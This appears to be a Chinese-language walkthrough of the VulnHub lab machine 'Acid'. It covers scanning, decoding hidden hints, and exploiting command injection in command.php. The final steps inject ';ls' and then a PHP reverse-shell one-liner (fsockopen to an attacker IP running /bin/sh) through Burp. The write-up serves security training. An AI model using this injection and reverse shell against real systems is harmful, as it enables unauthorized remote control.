靶机:acid(https://download.vulnhub.com/acid/Acid.rar)网络模式:nat
扫描主机
扫描端口33447/tcp,Apache2.4.10
目录扫描
浏览网站,查看源码底下看到一串十六进制编码
先ascii转换,在base64转码得到 wow.jpg
访问wow.jpg报错404想到上面我们扫描目录images
将图片保存,记事本打开,发现一串数字
先ascii转码,在MD5转换得到63425
但暂时并没有什么账号或者需要登陆的地方,我们用dirbuster扫描(kali自带)
依次访问cake.php,一个登陆界面,且标题变成magic_box
hacked.php
好像都没什么,我们访问下Magic_Box,说明有这个目录
继续扫描
访问command.php,存在命令执行漏洞
输入127.0.0.1;ls
看到一个tail.php
shell反弹
在command.php界面输入127.0.0.1然后抓包
然后发送到Decoder编码;php -r '$sock=fsockopen("192.168.6.129",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
将编码后的内容输入在127.0.0.1后面然后发送到Repeater 点击send